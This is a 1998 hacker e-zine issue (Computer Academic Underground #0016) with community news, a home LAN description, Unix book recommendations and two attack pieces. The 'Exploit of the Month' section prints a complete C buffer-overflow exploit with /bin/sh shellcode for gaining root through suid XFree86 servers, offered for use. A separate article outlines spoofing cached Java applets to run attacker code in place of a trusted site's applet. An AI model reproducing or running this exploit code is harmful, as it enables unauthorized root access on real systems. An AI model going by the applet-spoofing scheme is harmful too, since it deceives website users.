_____________________________________________ / \ | ___________________________________ | | | | | | | | | | | | | | | | | | | | | _________| | | | | | / \ | | | | / \ | | | | / \ | | | |__________/ \__________| | | / | \ | | / | \ | | / | \ | | /______________|______________\ | | | | Computer Academic Underground | | | | Electronic Magazine | | #0016 | | 0215.98 | \ _____________________________________________ / ############################################################################## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ============================================================================== ------------------------------------------------------------------------------ .............................................................................. Table of Contents Foreward General Member Listing -= CAU =- 817 2600 Meeting -= CAU =- Yep, It's Me Again Scion Kai Small LAN Administration Scion Kai I)ruid's Novice Corner I)ruid Hacking Java Applet Spoofing I)ruid Exploit of the Month -= CAU =- Phreaking Closing ############################################################################## Foreward Hello everyone, and welcome to another month. This month, we have a return from an old contributor, Scion Kai. Also, I'd like to point out this month a site that I now frequent daily. Slashdot.org is a techie-news site that is kept very up to date, and is not moderated like the mainstream media. People can say what they want to say, post articles, etc. Slashdot.org is a VERY good site, and I would definately recomend checking it out. The URL is "http://www.slashdot.org". I)ruid ############################################################################## General %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Member Listing (In the order in which they were brought into the CAU) Handle IRC Nick E-Mail -------------------------------------------------------------- I)ruid I}ruid druid@caughq.org Ultra Violet uv_ uv@caughq.org Crimson Assassin Crimson_A crimson@caughq.org Fizban Fizban^ fizban@caughq.org Sublime sublime sublime@caughq.org int3l int3l int3l@caughq.org MajestiX maJesTix majestix@caughq.org -------------------------------------------------------------- -= CAU =- %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 817 2600 Meeting First Friday of Every Month 6:00pm until 9:00pm Cafe Cybre 481 Harwood Road Hurst, Texas Phone: METRO: 817.268.0060 "Now with TCP/IP Technology!" (inside joke) -= CAU =- %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Yep, It's Me Again Well, hello everyone-it's your old buddy Scion Kai. Not that you really care, but that's okay because I don't give a shit about you either. If any of you remember, I used to do some articles for the zine back when it first started-you know, just general stuff about how the net sucks and all that. Don't worry-I'm pretty much through bitching for now. Yes, I know how much that disappoints you all (well, most of you anyways), but don't worry; I'm sure I'll see something soon that'll set me off. For now, I'm just glad to be back after having spent the past year in seclusion. I'd also like to point out that I'm quite happy that CAU dropped its relationship with LiE [gagging sounds in background] finally. What a Load of intestinal Excrements. (Score 1 for I)ruid. Yahoo.) Okay, so I'm bitter. I had some issues with LiE, which is why I left in the first place for a while, but that's all in the past (thankfully). So here's to the good times, and I'll be coming back next month to bitch for a while-I promise. Scion Kai (losgann@pair.com) Yeah, write to me- see if I care. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Small LAN Administration (Or At Least My Idea Of It) I figured since I didn't gripe about anything of merit in my article this month, I figured I would contribute this as well. This'll be a little column (I might continue it, I don't know) on my views in LAN administration. I base it on the networks I'm building at home, so it'll be of most concern to people who are interested in starting up a small LAN from scratch. I plan on covering mainly administration and security, plus a little network cartography. Well, I don't know, really-let's see what happens when I sit down and ramble on about something useful rather than just sitting down and typing out garbage about encryption philosophy and such. My network's of mixed platform, so I should get to cover a lot of topics with it. For starters, let me introduce you to my network at home: [ HP DeskJet 400 ] [ 28.8kbps modem to ISP ] | | [ Kiest, a Linux 2.0.30 box ] --- 10baseT hub --- [Maeve, a Linux 2.0.30 box ] | | Arcnet hub [ Saleem, a Mac PowerBook 520 ] | [ Branwen, an MS-DOS 6.21 box ] I have some other boxes I'm working on, but they're not "officially" on my network yet. The whole of it is TCP/IP v6 (IPng) based for future expansion, but I use v4 addresses and encapsulation for compatibility. I only use IP v4 on the Arcnet portion since I have a DOS client on there (there aren't any IP v6 clients for DOS to my knowledge). Kiest is my main server. It's an Intel P75 with 24mb of RAM running Linux 2.0.30 (slackware-3.4 distribution, upgraded from slackware96). Kiest stores about 90% of the files that are used on the network, including shared binaries and home directories. I prefer to use Samba (an SMB/LAN Manager server) in conjunction with NFS due to the fact that there aren't any NFS clients for DOS or Windows that are worth their salt. Kiest also acts as a password server of sorts. I considered usings NIS, but decided that NIS was not worth the security risks involved. Instead, a main list of passwords is kept in the /etc/passwd (with Shadow installed) on Kiest. To be able to access the SMB shares or NFS exports, users on the workstations must enter their username and password to log in as it is on Kiest, since I have user-level security enabled in the Samba configuration and user-password verification is required for NFS anyway. This seemed to me to be the best way to handle security on this small of a network, especially since the SMB shares and NFS exports are the main focus of the network. Of course, access to these services is limited to the local IP subnet, thus preventing outsiders from mounting my local directory hierarchies. Kiest also runs other server applications, such as Apache 1.2.4 (WWW), BIND-8.1.1 (DNS), wu.ftpd (FTP), sendmail 3.4 (SMTP), and pop3d (POP2/3). I plan on going into detail on setting up these servers in future articles. Maeve is just a lowly 386DX-40 with 8mb of RAM that I use as a small server. It's not an incredibly powerful machine, but it gets the job done and it takes some of the CPU load off of Kiest. Essentially, all it does is start a basic installation of Linux 2.0.30, then mounts the /usr structure from NFS on Kiest. It starts up BIND to supply primary DNS service for my local network, as well as some other basic servers. I haven't completely decided what Maeve's role will ultimately be on my network, but I'm experimenting. Ah, then there's Saleem. Saleem is my notebook computer that I cart around. Most of the time it's not actually hooked into the network, but if I need to access something on the network from it, I can just plug it in and then telnet or FTP into Kiest or Maeve or wherever. It's just one of those convenience things. Then we get to the odd-ball part of my network. I have an Arcnet NIC in Kiest which is hooked into an active hub and then to Branwen. Why the hell would anyone want to use Arcnet, you ask? Simple: it's probably the single most reliable network topology I've used. The flavor I prefer to use is a nice comfortable 2.5mbps (not as fast Ethernet, but not too slow either) and implements RG-62U (90-something ohm) coax cables. Actually, I use 50 ohm Ethernet coax cable on it. Arcnet is just that robust that it doesn't care if I do some screwy things like that. It just plugs along as happy as a lark. In fact, if I could afford the 100mbps Arcnet hardware, I wouldn't mind switching my entire network to Arcnet just for that reliability factor. Of course, that doesn't answer why I chose to mix Arcnet into my Ethernet network. Well, two reasons: 1) I already had the stuff lying around so I might as well use it; and 2) older computers seem to like it better than Ethernet. Particularly, Branwen is a Tandy 1000TX, a 286 with 768kb of RAM. Really it's just an experiment in network compatibility. The computer itself may not be able to do much on it's own, but it makes an excellent workstation for telnetting into Kiest to do work there. It implements the simple Crynwr packet drivers for the hardware and the ancient PC/IP software that I have no idea who wrote. Getting this setup to actually work took a few tries. The Linux kernel Arcnet driver actually creates three different devices called arc0, arc0e, and arc0s for different encapsulation methods and so forth. It took me a few tries to figure out which one worked, and I found that arc0e seemed to work the best. After that, it was only a simple routing procedure to get the bridging done across Kiest from my Ethernet network to my Arcnet network. Whew, that was a lot of information and I'm just skimming the surface. I think I'll stop here for now-you have a basic idea of the architecture of my network, and so I'll start to delve into the individual setup on each machine and also the setup of different network servers in future articles. I have a lot of writing to do. Let me know if this column actually interests anybody-I'd hate to keep writing all this shit if nobody's going to read it. I know this article probably wasn't all too informative in LAN administration, but it's just an introduction; more specific stuff comes later. Also, if there's anything specific you'd like to see me cover in an article, let me know and I'll try and see if I can help you. Scion Kai (losgann@pair.com) %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% I)ruid's Novice Corner: Top 5 Books To Read To Learn General Unix (in my opinion) Allright, this month for my Novice Corner Column, I thought I'd go over some books that will definately help you learn your way around and become familiar with the general UNIX environment and Linux in particular, as it is my current favorite flavor of UNIX, and I also threw in a few programming books for good measure, because if you can't at least look at some C code and halfway understand it, you need to be able to, and if you can't whip up a quick script to perform basic functions, you need to be able to handle that task as well. So now, on to the list: 1) UNIX IN A NUTSHELL - By O'Reilly & Associates This was the first UNIX reference I bought when I was first introduced to the UNIX environment, and it helped me out immensely. For starters, it has a decent introduction, and an overview of most of the standard UNIX commands. What I liked about this book was that it contained mini-references on a lot of the various editors that can be found on various flavors of UNIX. Being familiar with at least basic commands in EACH of these editors is definatly very useful. Also in this book is an overview of various shells and how they differ, and finally, it has a little information on software development and programming. This is just a great general all-around UNIX book, that will definately help the beginner. 2) THE LINUX BIBLE - From Yggdrasil Computing, Incorporated This is probably the most useful and well compiled book I own. The Linux Bible starts out with a general introduction and a few chapters on how to install and set up a general Linux environment. After that it has a few sections on general Systems Administration, Networking, and other such broad areas, and from then on, it is a collection of HOWTO's to help the Linux user set up specific software packages and features of his/her Linux system. This book has been invaluable to me in respect to setting up my own Linux systems and the CAUGHQ Local Area Network. I highly suggest geting this book at all cost. It really is the most complete guide to installing, running and maintaining a Linux system. 3) PRACTICAL C PROGRAMMING - By O'Reilly & Associates I do not actually own this book, but I plan to soon. Currently I am borrowing Sublime's copy. This book is a great introduction to the C programming language in a UNIX environment. If you don't know basic C already, this book will definately get you started. Practical C Programming is a very thorough guide to learning C, however, it is not set up as a reference book, it is formatted as more of a Textbook. 4) PROGRAMMING PERL - By O'Reilly & Associates If you don't know how to whip up a quick Perl script, you are at a loss. This is a great book to introduce you to basic scripting and get you going in Perl. This book not only has a few chapters to teach you basic Perl, but also has a reference section to help you along once you've gotten started. Being able to script in Perl is probably the most important thing you can learn next to coding in C, in my opinion, and this book will definately help you with that. 5) E-ZINES - By Lots of People I know this isn't a book, but E-Zines are part of the backbone of the hacker commmunity. When you have quality zines like Phrack, 2600 (even though it's not electronic), and others, you can learn a LOT from them, and they are generally slanted more towards the hacking aspect of UNIX rather than just the basics. But anyway, that's my Novice Corner column for this month. How about a little feedback. Is anyone actually learning anything from this column? Does anyone actually find it useful? If I get some positive feedback, I will continue doing a Novice Corner column every month, but otherwise, this will probably be the last Novice Corner, and I'll concentrate my efforts elsewhere, maybe on some more technical oriented articles, or maybe I'll actually find time to code. But anyway, that's all for this month. Enjoy. I)ruid ############################################################################## Hacking %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Java Applet Spoofing (Theory vs. Implementation) First off, I will do a little explanation of the theory behind this, and let you know a little bit about the limits of this theory due to the Java Security API. This theory is based on the assumption that the web browser being used will cache an applet when it first encounters it, and then use the cached applet if the browser ever comes across an applet with the same name on a different site. This is the case with Netscape Navigator 3.0 and older, and Microsoft IE 3.0 and older. I have not had the time to run some tests on the newer browsers or other browsers, but I do know about these two browsers in particular. The basic theory is, if you can cache your applet in the user's browser before they encounter the applet you are spoofing, thier browser will re-run your applet instead of the applet it is supposed to be running. The easiest way to cache your applet would be to find some way to delete all other applets in the browser's cache, then have the browser load your applet. I have two theorys on how to do this. Fist, you could write an applet to delete the cache, but this would be violating the Java Security API (no file deletion access), and you would probably have to find some way to have an applet do this, because as far as I know, it's not possible. The second theory is to fill up the cache so that the browser forces itself to delete it's old cache. This method is implementable, but would probably take much longer than desired. Once the cache is either deleted or contains no applets, you have the browser load your applet, which has the same name as the applet you are going to spoof. This reqires you to have the browser load your applet, but not execute the code which will be executed when you are actually spoofing the applet. The best way to do this would be to have the applet check and see what site the user is on, and have the applet exit if the browser is not on the correct site. For example, let's say you wanted to spoof wheredoyouwanttogotoday.class on www.microsoft.com. You would name your applet 'wheredoyouwanttogotoday.class' and have their browser load it. The applet would then check and see if the substring "http://www.microsoft.com" is in the current URL and if so, execute the code at that point. If the current URL does not match the requirements, the applet would simply exit, causing your applet to do absolutely nothing UNLESS it is actually running in place of the target applet to spoof. Theoretically, the user should not even notice the applet running unless they look down at the bottom of the browser and see it saying 'Starting Java' for a half a second while the applet loads and promptly exits. However, being as how I know NO Java whatsoever other than a few little lines of code I've looked over, I am not sure if this is feasable. I have heard that an applet may only have access to information such as the current URL if it has come from the site that is in the URL. However, if the browser believes the cached applet is the same as the one being spawned from the current website, this should work. However, if this design will not work, I'm sure there are other method's of delaying an applet's full execution. But anyway, by now you should get the general idea. I plan to write a followup to this article sometime in the future either after I have learned enough Java to implement and test this idea or I find someone who already knows Java who is willing to play around with this. But for now, I have other things to do. I)ruid %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Exploit of the Month This exploit was contributed by Gothic and Morning Dawn (http://www.morningdawn.org), to be put into consideration for exploit of the month. Obviously we chose it. It's short, it's sweet, and it exploits suid Xservers. Anyway, here it is: ----8<---- Snip Here ----8<---- /* XFree86 Server exploit for Intel x86 */ /* Have phun!! */ /* Feb. 4, 1998 */ /* Try 2 3 4 5 for OFFSET */ #define OFFSET 2 #include #include #include #define LENCODE ( sizeof( Code ) ) char Code[] = "\xeb\x40\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0" "\x3f\x89\xc2\x31\xdb\xb3\x0a\x31\xc9\xcd\x80\x89\xd0\x43\x41" "\xcd\x80\x89\xd0\x43\x41\xcd\x80\x31\xc0\x89\xc3\xb0\x17\xcd" "\x80\x31\xc0\xb0\x2e\xcd\x80\x31\xc0\xb0\x0b\x89\xf3\x8d\x4e" "\x08\x8d\x56\x0c\xcd\x80\xe8\xbb\xff\xff\xff/bin/sh"; char Display[ 0x4001 + OFFSET ] = ":99999", *ptr = Display + OFFSET + 1; char *args[] = { "X", "-nolock", Display, NULL }; main() { dup2( 0, 10 ); dup2( 1, 11 ); dup2( 2, 12 ); __asm__("movl %%esp,(%0)\n\tsubl %1,(%0)"::"b"(ptr),"n"(LENCODE+0x2000)); memcpy( ptr + 4, ptr, 0x3fc ); memset( ptr + 0x400, 0x90, 0x3c00 - LENCODE ); memcpy( ptr + 0x4000 - LENCODE, Code, LENCODE ); execve( "/usr/X11R6/bin/X", args, args + 3 ); perror( "execve" ); } ----8<---- Snip Here ----8<---- Also sent was the fix, which is of cource remove the suid bit from your Xserver (chmod -s /usr/X11R6/bin/YOUR_XSERVER) and such. Well, that's the exploit for this month. -= CAU =- ############################################################################## Phreaking ############################################################################## Closing Yes, once again, NOTHING in the phreak section... I guess the people in this area don't have much interest in phones anymore... but then again, there's not much in the zine of anything else either. I guess everyone's too busy with their personal lives lately to bother writing anything for the zine, let alone actually DOING anything useful. Well, hopefully we'll have a better turnout next month. Until then... I)ruid ############################################################################## ____ ____ __ __ / \ / \ | | | | ----====####/ /\__\##/ /\ \##| |##| |####====---- | | | |__| | | | | | | | ___ | __ | | | | | ------======######\ \/ /#| |##| |#| |##| |######======------ \____/ |__| |__| \______/ Computer Academic Underground